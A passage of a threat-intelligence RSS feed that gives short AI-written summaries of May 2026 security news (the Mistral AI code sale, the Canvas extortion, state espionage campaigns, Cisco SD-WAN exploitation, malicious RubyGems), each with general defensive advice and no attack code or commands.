      <link>https://brewedintel.io/articles/169ea56c-fb82-492e-82d3-b084e8ecb438</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/169ea56c-fb82-492e-82d3-b084e8ecb438</guid>
      <description>The TeamPCP hacker group is advertising stolen source code from Mistral AI for sale, threatening to leak the data if no buyer is found. This poses significant risk to Mistral AI&#x27;s intellectual property and competitive edge, and could expose security vulnerabilities in their AI models. Organizations should strengthen code repository security, monitor for unauthorized access, and have incident response plans for data breaches.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The TeamPCP hacker group is advertising stolen source code from Mistral AI for sale, threatening to leak the data if no buyer is found. This poses significant risk to Mistral AI&amp;#x27;s intellectual property and competitive edge, and could expose security vulnerabilities in their AI models. Organizations should strengthen code repository security, monitor for unauthorized access, and have incident response plans for data breaches.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Leaked source code can lead to intellectual property theft, exposure of security flaws, and reputational damage.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement strict access controls, monitor repository activity, and deploy data loss prevention tools.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Data Extortion, Source Code Theft&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/teampcp-hackers-advertise-mistral-ai-code-repos-for-sale/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 22:50:36 GMT</pubDate>
      <dc:creator>Ionut Ilascu</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/teampcp-hackers-advertise-mistral-ai-code-repos-for-sale/">Bleeping Computer</source>
      <category>Incident</category>
      <category>Data Extortion</category>
      <category>Source Code Theft</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Congress Puts Heat on Instructure After ShinyHunters Canvas Attacks</title>
      <link>https://brewedintel.io/articles/b10d88c9-aaa0-4427-8947-9c30a17ab2e4</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/b10d88c9-aaa0-4427-8947-9c30a17ab2e4</guid>
      <description>The US House Committee on Homeland Security has sent a letter to Instructure, the company behind the Canvas learning management system, regarding a cyberattack attributed to the ShinyHunters group. The attack caused significant outages and disruptions for educational institutions relying on Canvas. On the same day, Instructure announced it had reached an &#x27;agreement&#x27; with the cybercriminals, likely involving payment to end the extortion. This incident highlights the ongoing threat from ShinyHunters, who have targeted multiple high-profile victims. The congressional scrutiny underscores the seriousness of the breach and its impact on the education sector. Organizations using third-party platforms like Canvas must reassess their cybersecurity posture and vendor risk management. Immediate mitigation includes enhancing monitoring for anomalous activities and ensuring robust data backup and recovery procedures.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The US House Committee on Homeland Security has sent a letter to Instructure, the company behind the Canvas learning management system, regarding a cyberattack attributed to the ShinyHunters group. The attack caused significant outages and disruptions for educational institutions relying on Canvas. On the same day, Instructure announced it had reached an &amp;#x27;agreement&amp;#x27; with the cybercriminals, likely involving payment to end the extortion. This incident highlights the ongoing threat from ShinyHunters, who have targeted multiple high-profile victims. The congressional scrutiny underscores the seriousness of the breach and its impact on the education sector. Organizations using third-party platforms like Canvas must reassess their cybersecurity posture and vendor risk management. Immediate mitigation includes enhancing monitoring for anomalous activities and ensuring robust data backup and recovery procedures.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The ShinyHunters group has proven capable of disrupting critical educational platforms, affecting millions of users. This attack demonstrates that no third-party service is immune, and a breach can cascade to your organization&amp;#x27;s operations and reputation.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce multi-factor authentication, segment networks to limit lateral movement, and conduct regular third-party risk assessments. Also, develop and test incident response plans specifically for software supply chain compromises.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Extortion, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/cyberattacks-data-breaches/congress-instructure-shinyhunters-attacks&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 20:19:20 GMT</pubDate>
      <dc:creator>Rob Wright</dc:creator>
      <source url="https://www.darkreading.com/cyberattacks-data-breaches/congress-instructure-shinyhunters-attacks">Dark Reading</source>
      <category>Malware</category>
      <category>Data Extortion</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>&#x27;FrostyNeighbor&#x27; APT Carefully Targets Govt Orgs in Poland, Ukraine</title>
      <link>https://brewedintel.io/articles/7bb75897-ce9d-46d1-a24e-79887bc3b546</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/7bb75897-ce9d-46d1-a24e-79887bc3b546</guid>
      <description>The FrostyNeighbor APT group, attributed to Belarus, is conducting a targeted spear-phishing campaign against government entities in Poland and Ukraine. The attackers employ unique victim fingerprinting techniques to tailor their phishing lures before delivering payloads designed for espionage. This campaign highlights the persistent threat from state-sponsored actors and the need for advanced threat detection. Organizations should strengthen email security, deploy multi-factor authentication, and conduct regular security awareness training. Additionally, implementing endpoint detection and response solutions can help identify and mitigate such attacks.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The FrostyNeighbor APT group, attributed to Belarus, is conducting a targeted spear-phishing campaign against government entities in Poland and Ukraine. The attackers employ unique victim fingerprinting techniques to tailor their phishing lures before delivering payloads designed for espionage. This campaign highlights the persistent threat from state-sponsored actors and the need for advanced threat detection. Organizations should strengthen email security, deploy multi-factor authentication, and conduct regular security awareness training. Additionally, implementing endpoint detection and response solutions can help identify and mitigate such attacks.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;As a government-targeting APT, FrostyNeighbor poses a serious espionage threat to national security and organizational secrets.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement advanced email filtering, conduct phishing simulations, and enforce strict access controls to detect and prevent such targeted attacks.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Espionage, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/cyberattacks-data-breaches/frostyneighbor-apt-govt-orgs-poland-ukraine&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 16:59:25 GMT</pubDate>
      <dc:creator>Elizabeth Montalbano</dc:creator>
      <source url="https://www.darkreading.com/cyberattacks-data-breaches/frostyneighbor-apt-govt-orgs-poland-ukraine">Dark Reading</source>
      <category>Incident</category>
      <category>Espionage</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities</title>
      <link>https://brewedintel.io/articles/deec9e7e-1f4d-4a55-9ca8-31d3c66dccb8</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/deec9e7e-1f4d-4a55-9ca8-31d3c66dccb8</guid>
      <description>Active exploitation of multiple Cisco Catalyst SD-WAN vulnerabilities is underway. CVE-2026-20182 allows unauthenticated authentication bypass leading to administrative access, exploited by sophisticated actor UAT-8616. Separately, widespread exploitation of CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 enables remote code execution via chained attacks, with webshells like XenShell and Godzilla deployed for persistence. Impact includes full device compromise, privilege escalation, and network infiltration. Cisco has released patches; immediate upgrade is critical.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Active exploitation of multiple Cisco Catalyst SD-WAN vulnerabilities is underway. CVE-2026-20182 allows unauthenticated authentication bypass leading to administrative access, exploited by sophisticated actor UAT-8616. Separately, widespread exploitation of CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 enables remote code execution via chained attacks, with webshells like XenShell and Godzilla deployed for persistence. Impact includes full device compromise, privilege escalation, and network infiltration. Cisco has released patches; immediate upgrade is critical.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;These vulnerabilities allow unauthenticated attackers to gain complete administrative control over critical SD-WAN infrastructure, enabling full network compromise and lateral movement.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Apply Cisco security updates immediately, monitor for unauthorized SSH keys and NETCONF changes, and inspect devices for web shell indicators such as XenShell or Godzilla.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, Critical Severity, Authentication Bypass, Remote Code Execution, Web Shell&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Cisco Talos Intelligence Group | &lt;a href=&quot;https://blog.talosintelligence.com/sd-wan-ongoing-exploitation/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 16:02:36 GMT</pubDate>
      <dc:creator>Cisco Talos</dc:creator>
      <source url="https://blog.talosintelligence.com/sd-wan-ongoing-exploitation/">Cisco Talos Intelligence Group</source>
      <category>Vulnerability</category>
      <category>Authentication Bypass</category>
      <category>Remote Code Execution</category>
      <category>Web Shell</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Kazuar: Anatomy of a nation-state botnet</title>
      <link>https://brewedintel.io/articles/9c5312ef-f7d9-435d-88c7-57bbd2d4be14</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/9c5312ef-f7d9-435d-88c7-57bbd2d4be14</guid>
      <description>Kazuar is a sophisticated modular P2P botnet attributed to Russian state actor Secret Blizzard. It has evolved from a traditional backdoor into a versatile espionage tool targeting government and diplomatic entities in Europe and Central Asia, as well as systems previously compromised by Aqua Blizzard in Ukraine. The botnet uses a three-module architecture (Kernel, Bridge, Worker) to enable persistent covert access. Delivery methods include droppers like Pelmeni. Mitigation involves monitoring for behaviors such as leader election, IPC message routing, and working directory staging. Microsoft Defender provides detections. Organizations should focus on behavioral detection and network segmentation.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Kazuar is a sophisticated modular P2P botnet attributed to Russian state actor Secret Blizzard. It has evolved from a traditional backdoor into a versatile espionage tool targeting government and diplomatic entities in Europe and Central Asia, as well as systems previously compromised by Aqua Blizzard in Ukraine. The botnet uses a three-module architecture (Kernel, Bridge, Worker) to enable persistent covert access. Delivery methods include droppers like Pelmeni. Mitigation involves monitoring for behaviors such as leader election, IPC message routing, and working directory staging. Microsoft Defender provides detections. Organizations should focus on behavioral detection and network segmentation.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This botnet represents a persistent threat from a nation-state actor targeting high-value sectors, requiring robust defenses.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement behavioral monitoring for Kazuar&amp;#x27;s distinct inter-process communication and leader election patterns, and apply network segmentation to limit lateral movement.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, Critical Severity, Backdoor, Botnet, Espionage&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Microsoft Security Blog | &lt;a href=&quot;https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 15:00:00 GMT</pubDate>
      <dc:creator>Microsoft Threat Intelligence</dc:creator>
      <source url="https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/">Microsoft Security Blog</source>
      <category>Vulnerability</category>
      <category>Backdoor</category>
      <category>Botnet</category>
      <category>Espionage</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Ghostwriter Targets Ukrainian Government With Geofenced PDF Phishing, Cobalt Strike</title>
      <link>https://brewedintel.io/articles/9edfb8c5-9786-4355-9d02-a928e4735ee8</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/9edfb8c5-9786-4355-9d02-a928e4735ee8</guid>
      <description>Ghostwriter, a Belarus-linked threat actor active since 2016, has launched a new campaign targeting Ukrainian government entities using geofenced PDF phishing lures to deliver Cobalt Strike beacons. The attacks focus on cyber espionage and influence operations, exploiting the ongoing Russia-Ukraine conflict. Organisations should enhance email security and monitor for Cobalt Strike indicators.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Ghostwriter, a Belarus-linked threat actor active since 2016, has launched a new campaign targeting Ukrainian government entities using geofenced PDF phishing lures to deliver Cobalt Strike beacons. The attacks focus on cyber espionage and influence operations, exploiting the ongoing Russia-Ukraine conflict. Organisations should enhance email security and monitor for Cobalt Strike indicators.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Ghostwriter&amp;#x27;s targeting of Ukrainian government entities with sophisticated phishing and Cobalt Strike deployment poses a direct threat to national security and could lead to data exfiltration or disruption.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement advanced email filtering, user awareness training on geofenced phishing, and deploy endpoint detection rules for Cobalt Strike activity, along with network segmentation to limit lateral movement.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Cyber Espionage, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/ghostwriter-targets-ukrainian.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 14:00:37 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/ghostwriter-targets-ukrainian.html">The Hacker News</source>
      <category>Incident</category>
      <category>Cyber Espionage</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>KongTuke hackers now use Microsoft Teams for corporate breaches</title>
      <link>https://brewedintel.io/articles/287a6629-940a-4408-a6dc-69f8ebe02b4b</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/287a6629-940a-4408-a6dc-69f8ebe02b4b</guid>
      <description>Initial access broker KongTuke has adapted its social engineering techniques to exploit Microsoft Teams, enabling rapid compromise of corporate networks in as little as five minutes. By leveraging the trust associated with internal collaboration tools, the group gains persistent access, posing a significant threat to enterprise security. Organizations must enhance user awareness of phishing via Teams, implement multi-factor authentication, and monitor for suspicious meeting invitations to mitigate this evolving risk.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Initial access broker KongTuke has adapted its social engineering techniques to exploit Microsoft Teams, enabling rapid compromise of corporate networks in as little as five minutes. By leveraging the trust associated with internal collaboration tools, the group gains persistent access, posing a significant threat to enterprise security. Organizations must enhance user awareness of phishing via Teams, implement multi-factor authentication, and monitor for suspicious meeting invitations to mitigate this evolving risk.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Attackers can compromise corporate networks in minutes by exploiting trust in Microsoft Teams communications.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement strong identity verification for meeting invitations, monitor for unusual Teams activity, and enforce conditional access policies.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Social Engineering, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/kongtuke-hackers-now-use-microsoft-teams-for-corporate-breaches/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 12:12:40 GMT</pubDate>
      <dc:creator>Bill Toulas</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/kongtuke-hackers-now-use-microsoft-teams-for-corporate-breaches/">Bleeping Computer</source>
      <category>Incident</category>
      <category>Social Engineering</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Chinese APTs Expand Targets, Update Backdoors in Recent Campaigns</title>
      <link>https://brewedintel.io/articles/ebbb64a8-9d18-4eb7-8a71-32c6f2d93261</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/ebbb64a8-9d18-4eb7-8a71-32c6f2d93261</guid>
      <description>Chinese APT groups Salt Typhoon and Twill Typhoon have expanded their targeting. Salt Typhoon compromised an energy entity in Azerbaijan, while Twill Typhoon targeted Asian entities with an updated remote access trojan (RAT). These campaigns indicate ongoing espionage and potential disruption. Organizations in the energy sector and Asian region should be vigilant. Mitigation includes monitoring for backdoor activity, updating detection signatures, and enhancing network segmentation.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Chinese APT groups Salt Typhoon and Twill Typhoon have expanded their targeting. Salt Typhoon compromised an energy entity in Azerbaijan, while Twill Typhoon targeted Asian entities with an updated remote access trojan (RAT). These campaigns indicate ongoing espionage and potential disruption. Organizations in the energy sector and Asian region should be vigilant. Mitigation includes monitoring for backdoor activity, updating detection signatures, and enhancing network segmentation.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;These APT campaigns target critical infrastructure and Asian entities, posing risks of data exfiltration and persistent access.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement network segmentation, monitor for anomalous C2 traffic, and update endpoint detection rules for known backdoor behaviors.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, APT, Remote Access Trojan&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/chinese-apts-expand-targets-update-backdoors-in-recent-campaigns/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 12:11:15 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/chinese-apts-expand-targets-update-backdoors-in-recent-campaigns/">SecurityWeek</source>
      <category>Malware</category>
      <category>APT</category>
      <category>Remote Access Trojan</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Kimsuky targets organizations with PebbleDash-based tools</title>
      <link>https://brewedintel.io/articles/77a66887-0879-4251-830d-7b57171f854e</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/77a66887-0879-4251-830d-7b57171f854e</guid>
      <description>Kimsuky (APT43) continues to evolve its arsenal, deploying PebbleDash and AppleSeed malware variants in campaigns targeting South Korea, with spillover to Brazil and Germany. The group uses spear-phishing emails and messenger contacts to deliver malicious attachments that drop backdoors and information stealers. New tactics include leveraging legitimate VSCode tunneling for persistence and DWAgent for remote access. The primary impact is data theft from government and defense sectors. Mitigation requires robust email filtering, user awareness training, and monitoring for anomalous use of legitimate tools like VSCode.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Kimsuky (APT43) continues to evolve its arsenal, deploying PebbleDash and AppleSeed malware variants in campaigns targeting South Korea, with spillover to Brazil and Germany. The group uses spear-phishing emails and messenger contacts to deliver malicious attachments that drop backdoors and information stealers. New tactics include leveraging legitimate VSCode tunneling for persistence and DWAgent for remote access. The primary impact is data theft from government and defense sectors. Mitigation requires robust email filtering, user awareness training, and monitoring for anomalous use of legitimate tools like VSCode.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Kimsuky&amp;#x27;s advanced social engineering and evolving malware pose a persistent threat to government and defense organizations, risking sensitive data exfiltration.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce strict email attachment policies, deploy endpoint detection to flag behaviors like VSCode tunneling, and conduct regular phishing simulations to reduce initial access.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Backdoor, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Kaspersky Securelist | &lt;a href=&quot;https://securelist.com/kimsuky-appleseed-pebbledash-campaigns/119785/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 11:00:58 GMT</pubDate>
      <dc:creator>Sojun Ryu</dc:creator>
      <source url="https://securelist.com/kimsuky-appleseed-pebbledash-campaigns/119785/">Kaspersky Securelist</source>
      <category>Malware</category>
      <category>Backdoor</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>FrostyNeighbor: Fresh mischief and digital shenanigans</title>
      <link>https://brewedintel.io/articles/2d99a7d4-3f20-446b-a353-de0e389eb855</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/2d99a7d4-3f20-446b-a353-de0e389eb855</guid>
      <description>ESET researchers have identified updated activities from the threat actor FrostyNeighbor, which has refined its compromise chain to support ongoing cyberespionage operations. The group continues to target organizations, likely focusing on data exfiltration and intelligence gathering. Organizations should review their security posture for indicators of compromise associated with FrostyNeighbor and enhance network monitoring to detect lateral movement and data exfiltration. This group&#x27;s persistence and evolving techniques pose a significant threat to sensitive data across various sectors.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;ESET researchers have identified updated activities from the threat actor FrostyNeighbor, which has refined its compromise chain to support ongoing cyberespionage operations. The group continues to target organizations, likely focusing on data exfiltration and intelligence gathering. Organizations should review their security posture for indicators of compromise associated with FrostyNeighbor and enhance network monitoring to detect lateral movement and data exfiltration. This group&amp;#x27;s persistence and evolving techniques pose a significant threat to sensitive data across various sectors.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;FrostyNeighbor is actively targeting organizations for cyberespionage, updating its attack methods to evade detection and maintain access for prolonged periods.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement robust network segmentation, endpoint detection and response solutions, and conduct regular threat hunting for signs of FrostyNeighbor&amp;#x27;s activities, including unusual outbound data transfers.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Cyberespionage&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: ESET WeLiveSecurity | &lt;a href=&quot;https://www.welivesecurity.com/en/eset-research/frostyneighbor-fresh-mischief-digital-shenanigans/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 14 May 2026 08:50:00 GMT</pubDate>
      <source url="https://www.welivesecurity.com/en/eset-research/frostyneighbor-fresh-mischief-digital-shenanigans/">ESET WeLiveSecurity</source>
      <category>Adversary</category>
      <category>Cyberespionage</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Iranian hackers targeted major South Korean electronics maker</title>
      <link>https://brewedintel.io/articles/89c039a4-3ccb-4719-9540-e18589f1b2a5</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/89c039a4-3ccb-4719-9540-e18589f1b2a5</guid>
      <description>MuddyWater, an Iran-linked advanced persistent threat group, has launched a broad cyber-espionage campaign targeting at least nine high-profile organizations across multiple sectors and countries, including a major South Korean electronics maker. The campaign aims to steal sensitive data and intellectual property, posing significant risks to affected entities. MuddyWater is known for using spear-phishing emails and custom backdoors to gain initial access and maintain persistence. Organizations are urged to strengthen their email security, implement multi-factor authentication, and monitor for suspicious activities to mitigate the threat.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;MuddyWater, an Iran-linked advanced persistent threat group, has launched a broad cyber-espionage campaign targeting at least nine high-profile organizations across multiple sectors and countries, including a major South Korean electronics maker. The campaign aims to steal sensitive data and intellectual property, posing significant risks to affected entities. MuddyWater is known for using spear-phishing emails and custom backdoors to gain initial access and maintain persistence. Organizations are urged to strengthen their email security, implement multi-factor authentication, and monitor for suspicious activities to mitigate the threat.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This campaign targets high-profile organizations across multiple sectors, leading to potential data breaches and intellectual property theft with severe business and national security impacts.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement robust spear-phishing defenses, enable multi-factor authentication, monitor for anomalous network connections, and apply timely security patches.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Cyber Espionage, Targeted Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/iranian-hackers-targeted-major-south-korean-electronics-maker/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 21:59:33 GMT</pubDate>
      <dc:creator>Bill Toulas</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/iranian-hackers-targeted-major-south-korean-electronics-maker/">Bleeping Computer</source>
      <category>Incident</category>
      <category>Cyber Espionage</category>
      <category>Targeted Attack</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Attackers Weaponize RubyGems for Data Dead Drops</title>
      <link>https://brewedintel.io/articles/d2169ee2-753f-4213-bd5a-3ec4508d12cc</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/d2169ee2-753f-4213-bd5a-3ec4508d12cc</guid>
      <description>Threat actors are publishing malicious RubyGems packages that include scrapers targeting public-facing UK government servers. The packages appear to use data dead drops for exfiltration, though the ultimate objective remains unclear. This supply chain attack could compromise the integrity of Ruby-based software development, affecting downstream users who depend on these packages. Organizations, particularly those in the UK government sector, should scrutinize RubyGems dependencies and monitor for unusual network traffic indicative of data exfiltration. Immediate mitigation includes verifying the authenticity of all RubyGems packages and employing runtime security controls to detect scrapers.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Threat actors are publishing malicious RubyGems packages that include scrapers targeting public-facing UK government servers. The packages appear to use data dead drops for exfiltration, though the ultimate objective remains unclear. This supply chain attack could compromise the integrity of Ruby-based software development, affecting downstream users who depend on these packages. Organizations, particularly those in the UK government sector, should scrutinize RubyGems dependencies and monitor for unusual network traffic indicative of data exfiltration. Immediate mitigation includes verifying the authenticity of all RubyGems packages and employing runtime security controls to detect scrapers.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Attackers are leveraging trusted package repositories to target government servers, potentially compromising sensitive data and undermining software supply chain security.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement strict dependency verification, use private package mirrors, and monitor for suspicious outbound connections from Ruby applications.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Malware, Supply Chain Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/application-security/attackers-weaponize-rubygems-data-dead-drops&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 13 May 2026 21:09:20 GMT</pubDate>
      <dc:creator>Alexander Culafi</dc:creator>
      <source url="https://www.darkreading.com/application-security/attackers-weaponize-rubygems-data-dead-drops">Dark Reading</source>
      <category>Adversary</category>
      <category>Malware</category>
      <category>Supply Chain Attack</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Tables Turn on &#x27;The Gentlemen&#x27; RaaS Gang With Data Leak</title>
      <link>https://brewedintel.io/articles/1e631cec-252b-401e-a445-4f750d7be507</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/1e631cec-252b-401e-a445-4f750d7be507</guid>
      <description>An OPSEC failure has led to a data leak from &#x27;The Gentlemen&#x27; RaaS gang, revealing key operational details. The group&#x27;s rise is attributed to a generous affiliate model, opportunistic TTPs, and an effective organizational structure. This incident provides valuable insight into RaaS operations, exposing recruitment strategies and payment models. Understanding these tactics enables defenders to better detect and disrupt similar groups. The leak underscores the persistent threat of ransomware and the importance of proactive measures, including robust backup strategies, employee training, and advanced endpoint protection.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;An OPSEC failure has led to a data leak from &amp;#x27;The Gentlemen&amp;#x27; RaaS gang, revealing key operational details. The group&amp;#x27;s rise is attributed to a generous affiliate model, opportunistic TTPs, and an effective organizational structure. This incident provides valuable insight into RaaS operations, exposing recruitment strategies and payment models. Understanding these tactics enables defenders to better detect and disrupt similar groups. The leak underscores the persistent threat of ransomware and the importance of proactive measures, including robust backup strategies, employee training, and advanced endpoint protection.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This OPSEC failure reveals the inner workings of a RaaS group, highlighting the effectiveness of their affiliate model and the need for defenders to scrutinize similar operations.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
